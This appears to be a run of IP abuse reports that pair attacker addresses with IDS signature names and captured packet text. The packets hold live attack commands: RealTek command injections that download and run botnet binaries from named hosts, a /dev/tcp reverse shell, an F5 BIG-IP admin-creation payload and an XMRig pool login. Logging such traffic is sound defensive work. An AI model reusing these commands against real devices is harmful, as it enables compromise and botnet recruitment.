117.219.142.185
26 Dec 2024
SERVER-WEBAPP Netgear DGN1000 series routers authentication bypass attempt (1:44687:3)
Time: 2024-12-25 23:42:49 - (Src Port: 47287, Dst Port: 80)
Packet Text: ...
.....
....E..([email protected] ...
dd ...P........P. .....
Hacking
202.21.42.108
11 Dec 2024
MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1)
Time 2024-12-11 06:53:34 (Src Port: 46763, Dst Port: 80)
Packet Text: ...
.....
....E.......@.....*l
dd ...P........P. .....Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
Hacking
91.193.18.13
04 Dec 2024
Source Port: TCP 47059 / Destination TCP 25
CnC Connected Security Intelligence Event - CnC The host may be under remote control 2024-12-04 06:57:39
Similar event on Internal IPs
Hacking
45.124.95.225
05 Nov 2024
Seen in a callback packet text from IP 146.103.38.222
SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1)
Time: 2024-11-05 08:49:16 (Src Port: 54576, Dst Port: 9034)
Packet Text: ..]....K.._...E....1.......g&.?.-..0#J....orf;cd /tmp; rm -rf main_mpsl; /bin/busybox wget http://45.124.95.225/main_mpsl; chmod +x main_mpsl; ./main_mpsl realtek; #
Hacking
146.103.38.222
05 Nov 2024
SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1)
Time: 2024-11-05 08:49:16 (Src Port: 54576, Dst Port: 9034)
Packet Text: ..]....K.._...E....1.......g&.?.-..0#J....orf;cd /tmp; rm -rf main_mpsl; /bin/busybox wget http://45.124.95.225/main_mpsl; chmod +x main_mpsl; ./main_mpsl realtek; #
SQL Injection
213.152.161.30
21 Oct 2024
CnC Time: 2024-10-21 12:49:13
Source Port: 40125, Destination Port: 3306
Hacking
164.52.24.187
04 Oct 2024
PUA-OTHER XMRig cryptocurrency mining pool connection attempt (1:45549:4)
Time: 2024-10-03 12:32:43 (Src Port: 42951, Dst Port: 25)
Packet Text: ..]....K.._...E..,[email protected] ..?.-......{.=83>............
l.....?.{"id": 1, "jsonrpc": "2.0", "method": "login", "params": { "login": "48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD", "pass": "x", "agent": "XMRig/2.6.0-beta2 (Linux x86_64) libuv/1.8.0 gcc/5.4.0"}}
Web App Attack
209.38.23.48
30 Sep 2024
Time 2024-09-29 02:35:18 (Src Port: 53670, Dst Port: 80)
Packet Text: ...
.....
....E..O....@....&.0
dd ...P........P. .....<?=base64_decode("emV0YXNheWFuZw==");?>
Web App Attack
45.148.10.238
17 Sep 2024
CnC traffic src port 42208 tcp dest port 443 (https) tcp
2024-09-16 14:50:01
Hacking
194.113.106.241
06 Sep 2024
Time 2024-09-06 13:23:11 (Src Port: 52495, Dst Port: 9034)
Packet Text: ..]....K.._...E..h.1....X
.qj.?.-...#J.T..orf;0<&196;exec 196<>/dev/tcp/194.113.106.241/7777; sh <&196 >&196 2>&196; #
SQL Injection
45.145.42.234
07 Aug 2024
SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1) 5x
2024-08-07 07:57:54 Source Ports UDP 50906,45573, 42614, 43275, 33057, 37465 > Destination port 9034
SQL Injection
128.199.16.182
17 Jun 2024
Port scanning (Port 3389) on various devices.
Port Scan
117.242.239.219
27 May 2024
SERVER-WEBAPP DD-WRT httpd cgi-bin remote command execution attempt (1:26275:5)
Time: 2024-05-25 02:07:35 (Src Port: 49777, Dst Port: 8443)
Packet Text: ...
.....
....E..([email protected] ...
dj..q .........P. .....
SQL Injection
92.249.48.41
22 May 2024
SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1)
Time 2024-05-21 17:44:01 (Src Port: 40198, Dst Port: 9034)
Packet Text: ..]....K.._...E....1......\.0)?.-...#J.u..orf;cd /tmp; rm -rf mpsl; /bin/busybox wget http://91.92.252.157/rebirth.mpsl; chmod 777 *; ./rebirth.mpsl; #
SQL Injection
206.189.204.202
29 Apr 2024
SERVER-WEBAPP F5 BIG-IP AJP authentication bypass attempt
Time 2024-04-26 15:59:58, (Src Port: 51054, Dst Port: 80)
Packet Text: ...
.....
....E..,....@.......
dd .n.P........P. .......HTTP/1.1.../tmui/Control/form...127.0.0.1...localhost...localhost..P.....Tmui-Dubbuf...BBBBBBBBBBB..
REMOTEROLE...0.....localhost....admin...q_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=iAEKx&name_before=&passwd=Ilt7rTMJAcBE&passwd_before=&finished=x&finished_before=...
Web App Attack
45.159.188.241
19 Jan 2024
SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1)
Time 2024-01-19 03:14:46 UDP (Src Port: 37202, Dst Port: 9034)
Packet Text: ..]....K.._...E....1......-...?.-..R#J.l..orf;cd /tmp||cd /var&&/bin/busybox wget https://paradox-team.dev/Anti-Honey-Pot/x86_64 -O 11&&./11;#
SQL Injection
157.90.250.90
11 Jan 2024
MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1)
IP address seen in callback from attempt initiated from 159.203.23.44
Time 2024-01-10 17:12:45
Hacking
159.203.23.44
11 Jan 2024
...
.....
....E.......@......,
dd..".P........P. .....User-Agent: Hello, world
Host: 127.0.0.1:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Hacking
59.178.92.220
19 Dec 2023
Time 2023-12-18 21:43:22 (Src Port: 43166, Dst Port: 80)
Packet Text: ...
.....
....E.......@...;.\.
dd ...P........P. .....User-Agent: Hello, world
Host: 127.0.0.1:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Hacking
134.19.179.195
14 Dec 2023
Time 2023-12-12 23:42:22
Source port 44959 UDP / Destination 35442 / udp
Hacking
94.156.6.92
31 Oct 2023
Seen in packet info of an attack from 94.156.6.66, possible callback or malware host
Exploited Host
94.156.6.66
31 Oct 2023
SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1)
Time 2023-10-31 12:28:11 (Src Port: 34351, Dst Port: 9034)
Packet Text: ..]......,E...E(...1....(.^..B?.$../#J.q..orf;cd /tmp; rm -rf mpsl; /bin/busybox wget http://94.156.6.92/uwu/mpel; chmod +x mpsl; ./mpsl rt.mpsl; #
SQL Injection
107.175.212.32
31 Oct 2023
Various unauthorized attempts between 2023-10-31 10:51:44 - 2023-10-31 12:47:33
Hacking
222.112.82.141
31 Oct 2023
Unauthorized attempt 2023-10-31 03:25:00
Source port 49617 > Destination port 61616
Hacking
194.180.48.119
18 Oct 2023
Unauthorized attempt 2023-10-18 08:50:53
Source Port 50555 > Destination Port 25
Hacking